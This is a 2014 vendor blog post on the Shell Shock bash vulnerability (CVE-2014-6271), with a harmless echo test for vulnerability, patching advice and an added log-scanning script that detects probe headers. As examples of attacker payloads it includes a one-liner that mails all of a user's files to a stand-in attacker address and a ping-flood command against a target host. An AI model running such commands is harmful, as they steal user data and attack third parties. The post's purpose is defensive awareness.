
Are You Vulnerable to the Shell Shock Bug?

September 26, 2014 | Heroix Staff

I’ve written a few posts where I’ve advocated moving from XP to Linux and stated that one of the benefits of Linux is that it is relatively free of malware and viruses. Not completely secure, but relatively so. One avenue of attack for Linux and other Unix variants is that some of their basic core utilities were written before internet security was a significant consideration, and potential exploits are now being found in that comparatively ancient foundation.

Case in point: CVE-2014-6271, dubbed the Shell Shock bug. As explained on seclists.org, the problem is that the bash shell in Unix/Linux allows an environment variable to be defined as a function. However, bash continues to process the code past the end of the function definition. The following command contains an example of the flaw and can be used to determine whether you’re vulnerable:

env X='() { :;}; echo you are vulnerable' bash -c 'echo this was a test'

If you run this command and see “you are vulnerable” and “this was a test”, then the flaw can be exploited on your system. If all you see is “this was a test”, then you’re OK. The problematic part of the command above is the “echo you are vulnerable” section, because it can be replaced with any command. In most cases the Shell Shock bug won’t run with root permissions, so it won’t be able to delete system files. However, even a minimally privileged user account can mail all of a user’s files to a hacker (cd; cat * | mail -s "all my files" hacker@hacker.org), or set a computer up as a node in a DDoS attack (ping -c 9999999 ddos.target.com), or fill in your own computer security worst nightmare scenario.

Another factor is that Linux and Unix computers aren’t the only vulnerable systems. The bash shell is used on network devices, is embedded into the “internet of everything”, and is the base for Apple systems. The problem isn’t that bash is difficult to patch; the problem is that it is difficult to patch every bash shell with this vulnerability. Given the patch issues Apple has had recently, they need to do their best to impress upon their users that the Shell Shock patch is a critical security update.

Is this as serious a threat as Heartbleed was? Yes. In fact, it may be worse because it’s easier to exploit. Heartbleed exploited the possibility of finding confidential information in a random memory dump. Shell Shock can be exploited through HTTP headers passed to CGI scripts and depends mostly on finding a vulnerable device. Hackers had already created worms to find devices and exploit Shell Shock less than a day after the vulnerability was announced.
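Because the attack arrives in HTTP headers, probes show up in web server access logs as the function-definition prefix "() {" inside a logged field. The following is an added example, not part of the original post: the function names, the sample log lines and the use of the combined log format are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: flag access-log entries that contain the bash
# function-definition prefix "() {" that CVE-2014-6271 depends on.

# Constructed sample log in combined log format. Addresses come from the
# documentation ranges; the payload is the harmless echo test shown above.
sample_log() {
cat <<'EOF'
192.0.2.10 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Sep/2014:10:02:13 +0000] "GET /cgi-bin/status HTTP/1.1" 200 94 "-" "() { :;}; echo you are vulnerable"
203.0.113.5 - - [25/Sep/2014:10:03:44 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 210 "() {:; }; echo probe" "curl/7.30"
192.0.2.10 - - [25/Sep/2014:10:04:00 +0000] "GET /docs/func() HTTP/1.1" 200 80 "-" "Mozilla/5.0"
EOF
}

# Signature: "()" followed by optional whitespace and "{".
# A bare "()" in a URL (last sample line) does not match.
SIG='\(\)[[:space:]]*\{'

# Read a log on stdin; print "source-IP request-path" for each matching line.
find_shellshock_probes() {
    grep -E "$SIG" | awk '{ print $1, $7 }'
}

# Read a log on stdin; print the number of matching lines (0 if none).
count_shellshock_probes() {
    grep -Ec "$SIG" || true
}

# Stand-alone run over the constructed sample.
sample_log | find_shellshock_probes
```

The default combined format records only the Referer and User-Agent headers, so a probe carried in any other header is invisible to this check unless the server is configured to log that header.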

In the last post, I discussed how it’s a good idea to wait before you apply some patches. For OS patches like the quickly pulled iOS 8.0.1, you’re better off waiting. Security patches should be applied as soon as possible. With a vulnerability like Shell Shock, you need to check all your systems, patch them as soon as patches are available, and enact a mitigation plan until everything is patched.

Unfortunately, final patches may take a while, and bash updates issued as of 9/25 may not completely fix the problem. We will likely see multiple rounds of patches before this is fully addressed.

10/1/14 Update: See Shell Shock Patch Update for information on additional bash bugs and links to vendor patches.